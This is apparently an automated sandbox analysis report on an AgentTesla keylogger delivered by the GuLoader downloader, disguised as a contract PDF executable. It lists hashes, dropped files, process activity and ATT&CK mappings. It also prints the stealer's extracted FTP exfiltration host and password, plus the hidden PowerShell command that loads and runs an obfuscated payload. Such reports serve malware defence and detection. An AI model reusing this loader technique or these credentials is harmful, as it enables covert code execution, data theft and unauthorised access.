agenttesla | 35e6acc4ddeace130bae6e47e1e1062862fd7f6b4fecf8136dd3e109c5011aa4

General

Target

ANÁLISIS DEL CONTRATO-pdf.exe
Size

703KB
MD5

1a19d3b35592f19f97ad7c43b0a875e6
SHA1

38fd4bb32e9b5a0d58413954bed06aadb3e714ba
SHA256

35e6acc4ddeace130bae6e47e1e1062862fd7f6b4fecf8136dd3e109c5011aa4
SHA512

8f9de97ca969b26809fc47101091c20895bcc35793a331d22cc7fa32929fcc2229eb7b99b44d3a070431adc0795d5c81175e8fb98688a73382d72d4ad3ebf0f4
SSDEEP

12288:ywFGHEJsv/EqlEyhS6fOaoceSZylgimtdYM3O0V7bbb:y5HEJsHEqlHSkElgZtub0V7j

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.vvspijkenisse.nl
Port:
21
Username:
[email protected]
Password:
playingboyz231

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Drops file in System32 directory 1 IoCs

Processes:

ANÁLISIS DEL CONTRATO-pdf.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Haglskadeforsikring\Miljankenvnet.ini ANÁLISIS DEL CONTRATO-pdf.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Haglskadeforsikring\Miljankenvnet.ini	ANÁLISIS DEL CONTRATO-pdf.exe

Drops file in Program Files directory 4 IoCs

Processes:

ANÁLISIS DEL CONTRATO-pdf.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Common Files\integraltegnets\substrate.Ski	ANÁLISIS DEL CONTRATO-pdf.exe
File created	C:\Program Files (x86)\cockling.lnk	ANÁLISIS DEL CONTRATO-pdf.exe
File opened for modification	C:\Program Files (x86)\cockling.lnk	ANÁLISIS DEL CONTRATO-pdf.exe
File opened for modification	C:\Program Files (x86)\Kldebonnets.kod	ANÁLISIS DEL CONTRATO-pdf.exe

Drops file in Windows directory 3 IoCs

Processes:

ANÁLISIS DEL CONTRATO-pdf.exe

description	ioc	process
File opened for modification	C:\Windows\Calottes.Doo	ANÁLISIS DEL CONTRATO-pdf.exe
File opened for modification	C:\Windows\bagvognen.lnk	ANÁLISIS DEL CONTRATO-pdf.exe
File created	C:\Windows\bagvognen.lnk	ANÁLISIS DEL CONTRATO-pdf.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

ANÁLISIS DEL CONTRATO-pdf.exe

description	pid	process	target process
PID 3040 wrote to memory of 1660	3040	ANÁLISIS DEL CONTRATO-pdf.exe	powershell.exe
PID 3040 wrote to memory of 1660	3040	ANÁLISIS DEL CONTRATO-pdf.exe	powershell.exe
PID 3040 wrote to memory of 1660	3040	ANÁLISIS DEL CONTRATO-pdf.exe	powershell.exe
PID 3040 wrote to memory of 1660	3040	ANÁLISIS DEL CONTRATO-pdf.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\ANÁLISIS DEL CONTRATO-pdf.exe
"C:\Users\Admin\AppData\Local\Temp\ANÁLISIS DEL CONTRATO-pdf.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Raastegendes=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Nondesulfurization\Tetrodotoxin\Uglegylpet225\Rejsebureau\Forsyningsskib.Evi';$Impoundage=$Raastegendes.SubString(56924,3);.$Impoundage($Raastegendes)"
2⤵
PID:1660

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
3⤵
PID:2064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Rkkens.ini

Filesize
32B

MD5
a8ca1db6ae34f5e5c152094f44f92476

SHA1
9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

SHA256
1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

SHA512
e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

Download Submit
C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Nondesulfurization\Tetrodotoxin\Uglegylpet225\Rejsebureau\Forsyningsskib.Evi

Filesize
55KB

MD5
b2c54dadf0aec1e7b39900949f8d1679

SHA1
2e4c3297515729015c62453cc6fb44f629e89f4e

SHA256
b7460b0941c2246ab083dc1d337ba1f1dcc78c0372b7cc1c7e1378b56895846e

SHA512
7b9fb5354681317348e8c38c2698b6fd10cdba6d0022c2c6e5036094c4a18c2daf2ce5d596256a97114003b1cdc10ae0cf944846fb25ed5e3117f16c9a864f74

Download Submit
C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Nondesulfurization\Tetrodotoxin\Uglegylpet225\Rejsebureau\Senaternes.Roy

Filesize
295KB

MD5
0a7d7f667c023342453da0b0e1acfa13

SHA1
d0afd80a5fba0e1ef7388144ff2962fd171f79d1

SHA256
667135c582b072003c3f6781280df0a00da6830e3efcb7a5e8e53f8f32cf650e

SHA512
702661ed98f65d13afc5a6184881561deb3eea979a5a1bbcf1f22eab537e723a3a644eb7878b15ad71a062faa2d521fd706e2bf37ca9345a501c9b39004721d2

Download Submit
memory/1660-174-0x0000000073670000-0x0000000073C1B000-memory.dmp

Filesize
5.7MB

Download
memory/1660-181-0x0000000006830000-0x0000000007B39000-memory.dmp

Filesize
19.0MB

Download
memory/1660-161-0x0000000073670000-0x0000000073C1B000-memory.dmp

Filesize
5.7MB

Download
memory/1660-164-0x0000000000280000-0x00000000002C0000-memory.dmp

Filesize
256KB

Download
memory/1660-165-0x0000000000280000-0x00000000002C0000-memory.dmp

Filesize
256KB

Download
memory/1660-169-0x00000000055F0000-0x00000000055F4000-memory.dmp

Filesize
16KB

Download
memory/1660-170-0x0000000006830000-0x0000000007B39000-memory.dmp

Filesize
19.0MB

Download
memory/1660-171-0x0000000006830000-0x0000000007B39000-memory.dmp

Filesize
19.0MB

Download
memory/1660-173-0x0000000076FD0000-0x00000000770A6000-memory.dmp

Filesize
856KB

Download
memory/1660-163-0x0000000000280000-0x00000000002C0000-memory.dmp

Filesize
256KB

Download
memory/1660-172-0x0000000076DE0000-0x0000000076F89000-memory.dmp

Filesize
1.7MB

Download
memory/1660-162-0x0000000073670000-0x0000000073C1B000-memory.dmp

Filesize
5.7MB

Download
memory/1660-177-0x0000000000280000-0x00000000002C0000-memory.dmp

Filesize
256KB

Download
memory/2064-175-0x0000000000A40000-0x0000000001D49000-memory.dmp

Filesize
19.0MB

Download
memory/2064-178-0x000000006F160000-0x00000000701C2000-memory.dmp

Filesize
16.4MB

Download
memory/2064-179-0x0000000000A40000-0x0000000001D49000-memory.dmp

Filesize
19.0MB

Download
memory/2064-182-0x000000006EA70000-0x000000006F15E000-memory.dmp

Filesize
6.9MB

Download
memory/2064-176-0x0000000076DE0000-0x0000000076F89000-memory.dmp

Filesize
1.7MB

Download
memory/2064-180-0x000000006F160000-0x000000006F1A0000-memory.dmp

Filesize
256KB

Download
memory/2064-184-0x0000000000A40000-0x0000000001D49000-memory.dmp

Filesize
19.0MB

Download
memory/2064-186-0x000000006EA70000-0x000000006F15E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads